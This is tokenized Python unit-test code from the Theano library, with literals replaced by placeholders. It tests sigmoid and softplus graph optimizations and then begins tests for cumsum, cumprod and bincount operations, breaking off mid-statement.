<EOL> good = _good_broadcast_unary_normal_no_complex , <EOL> name = '<STR_LIT>' , <EOL> ) <EOL> UltraFastSigmoidTester = makeBroadcastTester ( <EOL> op = ultra_fast_sigmoid , <EOL> expected = upcast_int8_nfunc ( lambda inputs : check_floatX ( <EOL> inputs , <NUM_LIT:1> / ( <NUM_LIT:1> + numpy . exp ( - inputs ) ) ) ) , <EOL> good = _good_broadcast_unary_normal_no_complex , <EOL> name = '<STR_LIT>' , <EOL> eps = <NUM_LIT> ) <EOL> HardSigmoidTester = makeBroadcastTester ( <EOL> op = hard_sigmoid , <EOL> expected = upcast_int8_nfunc ( lambda inputs : check_floatX ( <EOL> inputs , <NUM_LIT:1> / ( <NUM_LIT:1> + numpy . 
exp ( - inputs ) ) ) ) , <EOL> good = _good_broadcast_unary_normal_no_complex , <EOL> name = '<STR_LIT>' , <EOL> eps = <NUM_LIT> ) <EOL> SoftplusTester = makeBroadcastTester ( <EOL> op = softplus , <EOL> expected = upcast_int8_nfunc ( lambda inputs : check_floatX ( <EOL> inputs , numpy . log1p ( numpy . exp ( inputs ) ) ) ) , <EOL> good = dict ( _good_broadcast_unary_normal_no_complex , <EOL> int8 = [ numpy . arange ( - <NUM_LIT> , <NUM_LIT> , dtype = '<STR_LIT>' ) ] ) , <EOL> name = '<STR_LIT>' , <EOL> ) <EOL> class T_softplus ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> utt . seed_rng ( ) <EOL> def test_elemwise ( self ) : <EOL> utt . verify_grad ( softplus , [ numpy . random . rand ( <NUM_LIT:3> , <NUM_LIT:4> ) ] ) <EOL> class T_sigmoid_opts ( unittest . TestCase ) : <EOL> def get_mode ( self , excluding = None ) : <EOL> """<STR_LIT>""" <EOL> if excluding is None : <EOL> excluding = [ ] <EOL> m = theano . config . mode <EOL> if m == '<STR_LIT>' : <EOL> mode = theano . compile . mode . get_mode ( '<STR_LIT>' ) <EOL> else : <EOL> mode = theano . compile . mode . get_default_mode ( ) <EOL> if excluding : <EOL> return mode . excluding ( * excluding ) <EOL> else : <EOL> return mode <EOL> def test_exp_over_1_plus_exp ( self ) : <EOL> m = self . get_mode ( excluding = [ '<STR_LIT>' ] ) <EOL> x = T . vector ( ) <EOL> data = numpy . random . rand ( <NUM_LIT> ) . astype ( config . floatX ) <EOL> backup = config . warn . identify_1pexp_bug <EOL> config . warn . identify_1pexp_bug = False <EOL> try : <EOL> f = theano . function ( [ x ] , T . exp ( x ) / ( <NUM_LIT:1> + T . exp ( x ) ) , mode = m ) <EOL> assert [ node . op for node in f . maker . fgraph . toposort ( ) ] == [ sigmoid ] <EOL> f ( data ) <EOL> f = theano . function ( [ x ] , T . exp ( x ) / ( <NUM_LIT:2> + T . exp ( x ) ) , mode = m ) <EOL> assert [ node . op for node in f . maker . fgraph . toposort ( ) ] != [ sigmoid ] <EOL> f ( data ) <EOL> f = theano . function ( [ x ] , T . 
exp ( x ) / ( <NUM_LIT:1> - T . exp ( x ) ) , mode = m ) <EOL> assert [ node . op for node in f . maker . fgraph . toposort ( ) ] != [ sigmoid ] <EOL> f ( data ) <EOL> f = theano . function ( [ x ] , T . exp ( x + <NUM_LIT:1> ) / ( <NUM_LIT:1> + T . exp ( x ) ) , mode = m ) <EOL> assert [ node . op for node in f . maker . fgraph . toposort ( ) ] != [ sigmoid ] <EOL> f ( data ) <EOL> f = theano . function ( [ x ] , T . fill ( x , <NUM_LIT:1.0> ) / ( <NUM_LIT:1> + T . exp ( - x ) ) , mode = m ) <EOL> assert [ node . op for node in f . maker . fgraph . toposort ( ) ] == [ sigmoid ] <EOL> f ( data ) <EOL> f = theano . function ( [ x ] , T . fill ( x , <NUM_LIT:1.0> ) / ( <NUM_LIT:2> + T . exp ( - x ) ) , mode = m ) <EOL> assert [ node . op for node in f . maker . fgraph . toposort ( ) ] != [ sigmoid ] <EOL> f ( data ) <EOL> f = theano . function ( [ x ] , T . fill ( x , <NUM_LIT:1.0> ) / ( <NUM_LIT:1> - T . exp ( - x ) ) , mode = m ) <EOL> assert [ node . op for node in f . maker . fgraph . toposort ( ) ] != [ sigmoid ] <EOL> f ( data ) <EOL> f = theano . function ( [ x ] , T . fill ( x , <NUM_LIT> ) / ( <NUM_LIT:1> + T . exp ( - x ) ) , mode = m ) <EOL> assert [ node . op for node in f . maker . fgraph . toposort ( ) ] != [ sigmoid ] <EOL> f ( data ) <EOL> f = theano . function ( [ x ] , T . fill ( x , - <NUM_LIT:1.0> ) / ( <NUM_LIT:1> + T . exp ( - x ) ) , mode = m ) <EOL> assert [ node . op for node in f . maker . fgraph . toposort ( ) ] == [ sigmoid , <EOL> theano . tensor . inplace . neg_inplace ] <EOL> f ( data ) <EOL> f = theano . function ( [ x ] , T . fill ( x , - <NUM_LIT:1.0> ) / ( <NUM_LIT:1> - T . exp ( - x ) ) , mode = m ) <EOL> assert [ node . op for node in f . maker . fgraph . toposort ( ) ] != [ sigmoid , <EOL> theano . tensor . inplace . neg_inplace ] <EOL> f ( data ) <EOL> f = theano . function ( [ x ] , T . fill ( x , - <NUM_LIT:1.0> ) / ( <NUM_LIT:2> + T . exp ( - x ) ) , mode = m ) <EOL> assert [ node . op for node in f . maker . fgraph . 
toposort ( ) ] != [ sigmoid , <EOL> theano . tensor . inplace . neg_inplace ] <EOL> f ( data ) <EOL> f = theano . function ( [ x ] , T . fill ( x , - <NUM_LIT> ) / ( <NUM_LIT:1> + T . exp ( - x ) ) , mode = m ) <EOL> assert [ node . op for node in f . maker . fgraph . toposort ( ) ] != [ sigmoid , <EOL> theano . tensor . inplace . neg_inplace ] <EOL> f ( data ) <EOL> f = theano . function ( [ x ] , ( T . fill ( x , - <NUM_LIT:1.0> ) * T . exp ( x ) ) / <EOL> ( ( <NUM_LIT:1> + T . exp ( x ) ) * ( <NUM_LIT:1> + T . exp ( - x ) ) ) , mode = m ) <EOL> assert [ node . op for node in f . maker . fgraph . toposort ( ) ] == [ sigmoid , <EOL> T . mul ] <EOL> f ( data ) <EOL> f = theano . function ( [ x ] , ( T . fill ( x , - <NUM_LIT> ) * T . exp ( x ) ) / <EOL> ( ( <NUM_LIT:1> + T . exp ( x ) ) * ( <NUM_LIT:1> + T . exp ( - x ) ) ) , mode = m ) <EOL> assert [ node . op for node in f . maker . fgraph . toposort ( ) ] != [ sigmoid , <EOL> T . mul , theano . tensor . inplace . neg_inplace ] <EOL> f ( data ) <EOL> f = theano . function ( [ x ] , ( T . fill ( x , - <NUM_LIT:1.0> ) * T . exp ( x ) ) / <EOL> ( ( <NUM_LIT:2> + T . exp ( x ) ) * ( <NUM_LIT:1> + T . exp ( - x ) ) ) , mode = m ) <EOL> assert [ node . op for node in f . maker . fgraph . toposort ( ) ] != [ sigmoid , <EOL> T . mul , theano . tensor . inplace . neg_inplace ] <EOL> f ( data ) <EOL> f = theano . function ( [ x ] , ( T . fill ( x , - <NUM_LIT:1.0> ) * T . exp ( x ) ) / <EOL> ( ( <NUM_LIT:1> + T . exp ( x ) ) * ( <NUM_LIT:2> + T . exp ( - x ) ) ) , mode = m ) <EOL> assert [ node . op for node in f . maker . fgraph . toposort ( ) ] != [ sigmoid , <EOL> T . mul , theano . tensor . inplace . neg_inplace ] <EOL> f ( data ) <EOL> f = theano . function ( [ x ] , ( T . fill ( x , - <NUM_LIT:1.0> ) * T . exp ( x ) ) / <EOL> ( ( <NUM_LIT:1> + T . exp ( x ) ) * ( <NUM_LIT:1> + T . exp ( x ) ) ) , mode = m ) <EOL> assert [ node . op for node in f . maker . fgraph . toposort ( ) ] != [ sigmoid , <EOL> T . 
mul , theano . tensor . inplace . neg_inplace ] <EOL> f ( data ) <EOL> f = theano . function ( [ x ] , ( T . fill ( x , - <NUM_LIT:1.0> ) * T . exp ( x ) ) / <EOL> ( ( <NUM_LIT:1> + T . exp ( x ) ) * ( <NUM_LIT:2> + T . exp ( - x ) ) ) , mode = m ) <EOL> assert [ node . op for node in f . maker . fgraph . toposort ( ) ] != [ sigmoid , <EOL> T . mul , theano . tensor . inplace . neg_inplace ] <EOL> f ( data ) <EOL> finally : <EOL> config . warn . identify_1pexp_bug = backup <EOL> def test_1msigmoid ( self ) : <EOL> if not register_local_1msigmoid : <EOL> return <EOL> m = self . get_mode ( ) <EOL> x = T . fmatrix ( ) <EOL> f = theano . function ( [ x ] , <NUM_LIT:1> - T . exp ( x ) / ( <NUM_LIT:1> + T . exp ( x ) ) , mode = m ) <EOL> assert [ node . op for node in f . maker . fgraph . toposort ( ) ] == [ <EOL> tensor . neg , sigmoid_inplace ] <EOL> f = theano . function ( [ x ] , <NUM_LIT:1> - T . fill ( x , <NUM_LIT:1.0> ) / ( <NUM_LIT:1> + T . exp ( - x ) ) , mode = m ) <EOL> assert [ node . op for node in f . maker . fgraph . toposort ( ) ] == [ tensor . neg , <EOL> sigmoid_inplace ] <EOL> def test_local_sigm_times_exp ( self ) : <EOL> """<STR_LIT>""" <EOL> def match ( func , ops ) : <EOL> assert [ node . op for node in func . maker . fgraph . toposort ( ) ] == ops <EOL> m = self . get_mode ( excluding = [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> x , y = tensor . vectors ( '<STR_LIT:x>' , '<STR_LIT:y>' ) <EOL> f = theano . function ( [ x ] , sigmoid ( - x ) * tensor . exp ( x ) , mode = m ) <EOL> match ( f , [ sigmoid ] ) <EOL> f = theano . function ( [ x ] , sigmoid ( x ) * tensor . exp ( - x ) , mode = m ) <EOL> match ( f , [ tensor . neg , sigmoid ] ) <EOL> f = theano . function ( [ x ] , - ( - ( - ( sigmoid ( x ) ) ) ) * tensor . exp ( - x ) , mode = m ) <EOL> match ( f , [ tensor . neg , sigmoid , tensor . neg ] ) <EOL> f = theano . function ( <EOL> [ x , y ] , <EOL> ( sigmoid ( x ) * sigmoid ( - y ) * - tensor . exp ( - x ) * <EOL> tensor . 
exp ( x * y ) * tensor . exp ( y ) ) , <EOL> mode = m ) <EOL> match ( f , [ sigmoid , tensor . mul , tensor . neg , tensor . exp , sigmoid , <EOL> tensor . mul ] ) <EOL> def test_perform_sigm_times_exp ( self ) : <EOL> """<STR_LIT>""" <EOL> x , y , z , t = tensor . vectors ( '<STR_LIT:x>' , '<STR_LIT:y>' , '<STR_LIT:z>' , '<STR_LIT:t>' ) <EOL> exp = tensor . exp <EOL> def ok ( expr1 , expr2 ) : <EOL> trees = [ parse_mul_tree ( e ) for e in ( expr1 , expr2 ) ] <EOL> perform_sigm_times_exp ( trees [ <NUM_LIT:0> ] ) <EOL> trees [ <NUM_LIT:0> ] = simplify_mul ( trees [ <NUM_LIT:0> ] ) <EOL> good = theano . gof . graph . is_same_graph ( <EOL> compute_mul ( trees [ <NUM_LIT:0> ] ) , <EOL> compute_mul ( trees [ <NUM_LIT:1> ] ) ) <EOL> if not good : <EOL> print ( trees [ <NUM_LIT:0> ] ) <EOL> print ( trees [ <NUM_LIT:1> ] ) <EOL> print ( '<STR_LIT>' ) <EOL> theano . printing . debugprint ( compute_mul ( trees [ <NUM_LIT:0> ] ) ) <EOL> print ( '<STR_LIT>' ) <EOL> theano . printing . debugprint ( compute_mul ( trees [ <NUM_LIT:1> ] ) ) <EOL> assert good <EOL> ok ( sigmoid ( x ) * exp ( - x ) , sigmoid ( - x ) ) <EOL> ok ( - x * sigmoid ( x ) * ( y * ( - <NUM_LIT:1> * z ) * exp ( - x ) ) , <EOL> - x * sigmoid ( - x ) * ( y * ( - <NUM_LIT:1> * z ) ) ) <EOL> ok ( - sigmoid ( - x ) * <EOL> ( exp ( y ) * ( - exp ( - z ) * <NUM_LIT:3> * - exp ( x ) ) * <EOL> ( y * <NUM_LIT:2> * ( - sigmoid ( - y ) * ( z + t ) * exp ( z ) ) * sigmoid ( z ) ) ) * <EOL> - sigmoid ( x ) , <EOL> sigmoid ( x ) * <EOL> ( - sigmoid ( y ) * ( - sigmoid ( - z ) * <NUM_LIT:3> ) * ( y * <NUM_LIT:2> * ( ( z + t ) * exp ( z ) ) ) ) * <EOL> - sigmoid ( x ) ) <EOL> ok ( exp ( - x ) * - exp ( - x ) * ( - sigmoid ( x ) * - sigmoid ( x ) ) , <EOL> - sigmoid ( - x ) * sigmoid ( - x ) ) <EOL> ok ( - exp ( x ) * - sigmoid ( - x ) * - exp ( - x ) , <EOL> - sigmoid ( - x ) ) <EOL> def test_grad_log1msigm ( self ) : <EOL> x = tensor . matrix ( '<STR_LIT:x>' ) <EOL> lr = tensor . 
scalar ( '<STR_LIT>' ) <EOL> s = sigmoid ( x ) <EOL> l = T . log ( <NUM_LIT:1> - s ) <EOL> c = l . mean ( ) <EOL> ux = x - lr * theano . grad ( c , x ) <EOL> mode = self . get_mode ( ) <EOL> if not isinstance ( mode , theano . compile . DebugMode ) : <EOL> f = theano . function ( [ x , lr ] , ux , mode = mode ) <EOL> ux_v = f ( [ [ <NUM_LIT:50> ] ] , <NUM_LIT:0.1> ) <EOL> assert not numpy . isnan ( ux_v ) <EOL> def test_local_ultra_fast_sigmoid ( self ) : <EOL> x = tensor . matrix ( '<STR_LIT:x>' ) <EOL> s = sigmoid ( x ) <EOL> mode = self . get_mode ( '<STR_LIT>' ) <EOL> f = theano . function ( [ x ] , s , mode = mode ) <EOL> topo = f . maker . fgraph . toposort ( ) <EOL> assert len ( topo ) == <NUM_LIT:1> <EOL> assert topo [ <NUM_LIT:0> ] . op == sigmoid <EOL> mode = self . get_mode ( ) . including ( '<STR_LIT>' ) <EOL> f = theano . function ( [ x ] , s , mode = mode ) <EOL> topo = f . maker . fgraph . toposort ( ) <EOL> assert topo [ <NUM_LIT:0> ] . op == ultra_fast_sigmoid <EOL> assert len ( topo ) == <NUM_LIT:1> <EOL> ux_v = f ( [ [ - <NUM_LIT:50> , - <NUM_LIT:10> , - <NUM_LIT:4> , - <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:4> , <NUM_LIT:10> , <NUM_LIT:50> ] ] ) <EOL> def test_local_hard_sigmoid ( self ) : <EOL> x = tensor . matrix ( '<STR_LIT:x>' ) <EOL> s = sigmoid ( x ) <EOL> mode = self . get_mode ( '<STR_LIT>' ) <EOL> f = theano . function ( [ x ] , s , mode = mode ) <EOL> topo = f . maker . fgraph . toposort ( ) <EOL> assert topo [ <NUM_LIT:0> ] . op == sigmoid <EOL> assert len ( topo ) == <NUM_LIT:1> <EOL> mode = self . get_mode ( ) . including ( '<STR_LIT>' ) <EOL> f = theano . function ( [ x ] , s , mode = mode ) <EOL> topo = f . maker . fgraph . toposort ( ) <EOL> assert len ( topo ) > <NUM_LIT:1> <EOL> assert not any ( [ n . 
op == sigmoid for n in topo ] ) <EOL> ux_v = f ( [ [ - <NUM_LIT:50> , - <NUM_LIT:10> , - <NUM_LIT:4> , - <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:4> , <NUM_LIT:10> , <NUM_LIT:50> ] ] ) <EOL> class T_softplus_opts ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> if theano . config . mode == '<STR_LIT>' : <EOL> m = theano . compile . mode . get_mode ( '<STR_LIT>' ) . excluding ( <EOL> '<STR_LIT>' ) <EOL> else : <EOL> m = theano . compile . mode . get_default_mode ( ) . excluding ( <EOL> '<STR_LIT>' ) <EOL> self . m = m <EOL> utt . seed_rng ( ) <EOL> def test_logsigm_to_softplus ( self ) : <EOL> x = T . vector ( ) <EOL> out = T . log ( sigmoid ( x ) ) <EOL> f = theano . function ( [ x ] , out , mode = self . m ) <EOL> topo = f . maker . fgraph . toposort ( ) <EOL> assert len ( topo ) == <NUM_LIT:3> <EOL> assert isinstance ( topo [ <NUM_LIT:0> ] . op . scalar_op , theano . scalar . Neg ) <EOL> assert isinstance ( topo [ <NUM_LIT:1> ] . op . scalar_op , <EOL> theano . tensor . nnet . sigm . ScalarSoftplus ) <EOL> assert isinstance ( topo [ <NUM_LIT:2> ] . op . scalar_op , theano . scalar . Neg ) <EOL> f ( numpy . random . rand ( <NUM_LIT> ) . astype ( config . floatX ) ) <EOL> def test_log1msigm_to_softplus ( self ) : <EOL> x = T . matrix ( ) <EOL> out = T . log ( <NUM_LIT:1> - sigmoid ( x ) ) <EOL> f = theano . function ( [ x ] , out , mode = self . m ) <EOL> topo = f . maker . fgraph . toposort ( ) <EOL> assert len ( topo ) == <NUM_LIT:2> <EOL> assert isinstance ( topo [ <NUM_LIT:0> ] . op . scalar_op , <EOL> theano . tensor . nnet . sigm . ScalarSoftplus ) <EOL> assert isinstance ( topo [ <NUM_LIT:1> ] . op . scalar_op , theano . scalar . Neg ) <EOL> f ( numpy . random . rand ( <NUM_LIT> , <NUM_LIT:11> ) . astype ( config . floatX ) ) <EOL> out = T . log ( <NUM_LIT:1> - T . flatten ( sigmoid ( x ) ) ) <EOL> f = theano . function ( [ x ] , out , mode = self . m ) <EOL> topo = f . maker . fgraph . 
toposort ( ) <EOL> assert len ( topo ) == <NUM_LIT:3> <EOL> assert tensor . is_flat ( topo [ <NUM_LIT:0> ] . outputs [ <NUM_LIT:0> ] ) <EOL> assert isinstance ( topo [ <NUM_LIT:1> ] . op . scalar_op , <EOL> theano . tensor . nnet . sigm . ScalarSoftplus ) <EOL> assert isinstance ( topo [ <NUM_LIT:2> ] . op . scalar_op , theano . scalar . Neg ) <EOL> f ( numpy . random . rand ( <NUM_LIT> , <NUM_LIT:11> ) . astype ( config . floatX ) ) <EOL> out = T . log ( <NUM_LIT:1> - sigmoid ( x ) . reshape ( [ x . size ] ) ) <EOL> f = theano . function ( [ x ] , out , mode = self . m ) <EOL> topo = f . maker . fgraph . toposort ( ) <EOL> assert any ( isinstance ( node . op , T . Reshape ) for node in topo ) <EOL> assert any ( isinstance ( getattr ( node . op , '<STR_LIT>' , None ) , <EOL> theano . tensor . nnet . sigm . ScalarSoftplus ) <EOL> for node in topo ) <EOL> f ( numpy . random . rand ( <NUM_LIT> , <NUM_LIT:11> ) . astype ( config . floatX ) ) <EOL> def test_log1pexp_to_softplus ( self ) : <EOL> m = theano . config . mode <EOL> if m == '<STR_LIT>' : <EOL> m = '<STR_LIT>' <EOL> x = T . vector ( ) <EOL> out = T . log ( <NUM_LIT:1> + T . exp ( x ) ) <EOL> f = theano . function ( [ x ] , out , mode = self . m ) <EOL> topo = f . maker . fgraph . toposort ( ) <EOL> assert len ( topo ) == <NUM_LIT:1> <EOL> assert isinstance ( topo [ <NUM_LIT:0> ] . op . scalar_op , <EOL> theano . tensor . nnet . sigm . ScalarSoftplus ) <EOL> f ( numpy . random . rand ( <NUM_LIT> ) . astype ( config . floatX ) ) <EOL> class T_sigmoid_utils ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_compute_mul ( self ) : <EOL> x , y , z = tensor . vectors ( '<STR_LIT:x>' , '<STR_LIT:y>' , '<STR_LIT:z>' ) <EOL> tree = ( x * y ) * - z <EOL> mul_tree = parse_mul_tree ( tree ) <EOL> assert parse_mul_tree ( compute_mul ( mul_tree ) ) == mul_tree <EOL> assert theano . gof . graph . 
is_same_graph ( <EOL> compute_mul ( parse_mul_tree ( tree ) ) , tree ) <EOL> def test_parse_mul_tree ( self ) : <EOL> x , y , z = tensor . vectors ( '<STR_LIT:x>' , '<STR_LIT:y>' , '<STR_LIT:z>' ) <EOL> assert parse_mul_tree ( x * y ) == [ False , [ [ False , x ] , [ False , y ] ] ] <EOL> assert parse_mul_tree ( - ( x * y ) ) == [ True , [ [ False , x ] , [ False , y ] ] ] <EOL> assert parse_mul_tree ( - x * y ) == [ False , [ [ True , x ] , [ False , y ] ] ] <EOL> assert parse_mul_tree ( - x ) == [ True , x ] <EOL> assert parse_mul_tree ( ( x * y ) * - z ) == [ <EOL> False , [ [ False , [ [ False , x ] , [ False , y ] ] ] , [ True , z ] ] ] <EOL> def test_is_1pexp ( self ) : <EOL> backup = config . warn . identify_1pexp_bug <EOL> config . warn . identify_1pexp_bug = False <EOL> try : <EOL> x = tensor . vector ( '<STR_LIT:x>' ) <EOL> exp = tensor . exp <EOL> assert is_1pexp ( <NUM_LIT:1> + exp ( x ) ) == ( False , x ) <EOL> assert is_1pexp ( exp ( x ) + <NUM_LIT:1> ) == ( False , x ) <EOL> for neg , exp_arg in imap ( is_1pexp , [ ( <NUM_LIT:1> + exp ( - x ) ) , ( exp ( - x ) + <NUM_LIT:1> ) ] ) : <EOL> assert not neg and theano . gof . graph . is_same_graph ( exp_arg , - x ) <EOL> assert is_1pexp ( <NUM_LIT:1> - exp ( x ) ) is None <EOL> assert is_1pexp ( <NUM_LIT:2> + exp ( x ) ) is None <EOL> assert is_1pexp ( exp ( x ) + <NUM_LIT:2> ) is None <EOL> assert is_1pexp ( exp ( x ) - <NUM_LIT:1> ) is None <EOL> assert is_1pexp ( - <NUM_LIT:1> + exp ( x ) ) is None <EOL> assert is_1pexp ( <NUM_LIT:1> + <NUM_LIT:2> * exp ( x ) ) is None <EOL> finally : <EOL> config . warn . identify_1pexp_bug = backup </s>
<s> import unittest <EOL> import numpy as np <EOL> import numpy <EOL> import theano <EOL> from theano . tests import unittest_tools as utt <EOL> from theano . tensor . extra_ops import ( CumsumOp , cumsum , CumprodOp , cumprod , <EOL> CpuContiguous , cpu_contiguous , BinCountOp , <EOL> bincount , DiffOp , diff , squeeze , compress , <EOL> RepeatOp , repeat , Bartlett , bartlett , <EOL> FillDiagonal , fill_diagonal , <EOL> FillDiagonalOffset , fill_diagonal_offset , <EOL> to_one_hot , Unique ) <EOL> from theano import tensor as T <EOL> from theano import config , tensor , function <EOL> from theano . tests . unittest_tools import attr <EOL> numpy_ver = [ int ( n ) for n in numpy . __version__ . split ( '<STR_LIT:.>' ) [ : <NUM_LIT:2> ] ] <EOL> numpy_16 = bool ( numpy_ver >= [ <NUM_LIT:1> , <NUM_LIT:6> ] ) <EOL> def test_cpu_contiguous ( ) : <EOL> a = T . fmatrix ( '<STR_LIT:a>' ) <EOL> i = T . iscalar ( '<STR_LIT:i>' ) <EOL> a_val = numpy . asarray ( numpy . random . rand ( <NUM_LIT:4> , <NUM_LIT:5> ) , dtype = '<STR_LIT>' ) <EOL> f = theano . function ( [ a , i ] , cpu_contiguous ( a . reshape ( ( <NUM_LIT:5> , <NUM_LIT:4> ) ) [ : : i ] ) ) <EOL> topo = f . maker . fgraph . toposort ( ) <EOL> assert any ( [ isinstance ( node . op , CpuContiguous ) for node in topo ] ) <EOL> assert f ( a_val , <NUM_LIT:1> ) . flags [ '<STR_LIT>' ] <EOL> assert f ( a_val , <NUM_LIT:2> ) . flags [ '<STR_LIT>' ] <EOL> assert f ( a_val , <NUM_LIT:3> ) . flags [ '<STR_LIT>' ] <EOL> class TestCumsumOp ( utt . InferShapeTester ) : <EOL> def setUp ( self ) : <EOL> super ( TestCumsumOp , self ) . setUp ( ) <EOL> self . op_class = CumsumOp <EOL> self . op = CumsumOp ( ) <EOL> def test_cumsumOp ( self ) : <EOL> x = T . tensor3 ( '<STR_LIT:x>' ) <EOL> a = np . random . random ( ( <NUM_LIT:3> , <NUM_LIT:5> , <NUM_LIT:2> ) ) . astype ( config . floatX ) <EOL> self . assertRaises ( ValueError , cumsum , x , axis = <NUM_LIT:3> ) <EOL> self . 
assertRaises ( ValueError , cumsum , x , axis = - <NUM_LIT:4> ) <EOL> f = theano . function ( [ x ] , cumsum ( x ) ) <EOL> assert np . allclose ( np . cumsum ( a ) , f ( a ) ) <EOL> for axis in range ( - len ( a . shape ) , len ( a . shape ) ) : <EOL> f = theano . function ( [ x ] , cumsum ( x , axis = axis ) ) <EOL> assert np . allclose ( np . cumsum ( a , axis = axis ) , f ( a ) ) <EOL> def test_infer_shape ( self ) : <EOL> x = T . tensor3 ( '<STR_LIT:x>' ) <EOL> a = np . random . random ( ( <NUM_LIT:3> , <NUM_LIT:5> , <NUM_LIT:2> ) ) . astype ( config . floatX ) <EOL> self . _compile_and_check ( [ x ] , <EOL> [ self . op ( x ) ] , <EOL> [ a ] , <EOL> self . op_class ) <EOL> for axis in range ( - len ( a . shape ) , len ( a . shape ) ) : <EOL> self . _compile_and_check ( [ x ] , <EOL> [ cumsum ( x , axis = axis ) ] , <EOL> [ a ] , <EOL> self . op_class ) <EOL> def test_grad ( self ) : <EOL> a = np . random . random ( ( <NUM_LIT:3> , <NUM_LIT:5> , <NUM_LIT:2> ) ) . astype ( config . floatX ) <EOL> utt . verify_grad ( self . op , [ a ] ) <EOL> for axis in range ( - len ( a . shape ) , len ( a . shape ) ) : <EOL> utt . verify_grad ( self . op_class ( axis = axis ) , [ a ] , eps = <NUM_LIT> ) <EOL> class TestCumprodOp ( utt . InferShapeTester ) : <EOL> def setUp ( self ) : <EOL> super ( TestCumprodOp , self ) . setUp ( ) <EOL> self . op_class = CumprodOp <EOL> self . op = CumprodOp ( ) <EOL> def test_CumprodOp ( self ) : <EOL> x = T . tensor3 ( '<STR_LIT:x>' ) <EOL> a = np . random . random ( ( <NUM_LIT:3> , <NUM_LIT:5> , <NUM_LIT:2> ) ) . astype ( config . floatX ) <EOL> self . assertRaises ( ValueError , cumprod , x , axis = <NUM_LIT:3> ) <EOL> self . assertRaises ( ValueError , cumprod , x , axis = - <NUM_LIT:4> ) <EOL> f = theano . function ( [ x ] , cumprod ( x ) ) <EOL> assert np . allclose ( np . cumprod ( a ) , f ( a ) ) <EOL> for axis in range ( - len ( a . shape ) , len ( a . shape ) ) : <EOL> f = theano . 
function ( [ x ] , cumprod ( x , axis = axis ) ) <EOL> assert np . allclose ( np . cumprod ( a , axis = axis ) , f ( a ) ) <EOL> def test_infer_shape ( self ) : <EOL> x = T . tensor3 ( '<STR_LIT:x>' ) <EOL> a = np . random . random ( ( <NUM_LIT:3> , <NUM_LIT:5> , <NUM_LIT:2> ) ) . astype ( config . floatX ) <EOL> self . _compile_and_check ( [ x ] , <EOL> [ self . op ( x ) ] , <EOL> [ a ] , <EOL> self . op_class ) <EOL> for axis in range ( - len ( a . shape ) , len ( a . shape ) ) : <EOL> self . _compile_and_check ( [ x ] , <EOL> [ cumprod ( x , axis = axis ) ] , <EOL> [ a ] , <EOL> self . op_class ) <EOL> def test_grad ( self ) : <EOL> a = np . random . random ( ( <NUM_LIT:3> , <NUM_LIT:5> , <NUM_LIT:2> ) ) . astype ( config . floatX ) <EOL> utt . verify_grad ( self . op , [ a ] ) <EOL> for axis in range ( - len ( a . shape ) , len ( a . shape ) ) : <EOL> utt . verify_grad ( self . op_class ( axis = axis ) , [ a ] ) <EOL> class TestBinCountOp ( utt . InferShapeTester ) : <EOL> def setUp ( self ) : <EOL> super ( TestBinCountOp , self ) . setUp ( ) <EOL> self . op_class = BinCountOp <EOL> self . op = BinCountOp ( ) <EOL> def test_bincountFn ( self ) : <EOL> w = T . vector ( '<STR_LIT:w>' ) <EOL> def ref ( data , w = None , minlength = None ) : <EOL> size = data . max ( ) + <NUM_LIT:1> <EOL> if minlength : <EOL> size = max ( size , minlength ) <EOL> if w is not None : <EOL> out = np . zeros ( size , dtype = w . dtype ) <EOL> for i in range ( data . shape [ <NUM_LIT:0> ] ) : <EOL> out [ data [ i ] ] += w [ i ] <EOL> else : <EOL> out = np . zeros ( size , dtype = a . dtype ) <EOL> for i in range ( data . shape [ <NUM_LIT:0> ] ) : <EOL> out [ data [ i ] ] += <NUM_LIT:1> <EOL> return out <EOL> for dtype in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> x = T . vector ( '<STR_LIT:x>' , dtype = dtype ) <EOL> a = np . random . random_integers ( <NUM_LIT:50> , size = ( <NUM_LIT> ) ) . 
astype ( dtype ) <EOL> weights = np . random . random ( ( <NUM_LIT> , ) ) . astype ( config . floatX ) <EOL> f1 = theano . function ( [ x ] , bincount ( x ) ) <EOL> f2 = theano . function ( [ x , w ] , bincount ( x , weights = w ) ) <EOL> assert ( ref ( a ) == f1 ( a ) ) . all ( ) <EOL> assert np . allclose ( ref ( a , weights ) , f2 ( a , weights ) ) <EOL> f3 = theano . function ( [ x ] , bincount ( x , minlength = <NUM_LIT> ) ) <EOL> f4 = theano . function ( [ x ] , bincount ( x , minlength = <NUM_LIT:5> ) ) <EOL> assert ( ref ( a , minlength = <NUM_LIT> ) == f3 ( a ) ) . all ( ) <EOL> assert ( ref ( a , minlength = <NUM_LIT:5> ) == f4 ( a ) ) . all ( ) <EOL> if not dtype . startswith ( '<STR_LIT:u>' ) : <EOL> a [ <NUM_LIT:0> ] = - <NUM_LIT:1> <EOL> f5 = theano . function ( [ x ] , bincount ( x , assert_nonneg = True ) ) <EOL> self . assertRaises ( AssertionError , f5 , a ) <EOL> def test_bincountOp ( self ) : <EOL> w = T . vector ( '<STR_LIT:w>' ) <EOL> for dtype in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> int_bitwidth = theano . configdefaults . python_int_bitwidth ( ) <EOL> if int_bitwidth == <NUM_LIT:64> : <EOL> numpy_unsupported_dtypes = ( '<STR_LIT>' , ) <EOL> if int_bitwidth == <NUM_LIT:32> : <EOL> numpy_unsupported_dtypes = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> x = T . vector ( '<STR_LIT:x>' , dtype = dtype ) <EOL> if dtype in numpy_unsupported_dtypes : <EOL> self . assertRaises ( TypeError , BinCountOp ( ) , x ) <EOL> else : <EOL> a = np . random . random_integers ( <NUM_LIT:50> , size = ( <NUM_LIT> ) ) . astype ( dtype ) <EOL> weights = np . random . random ( ( <NUM_LIT> , ) ) . astype ( config . floatX ) <EOL> f1 = theano . 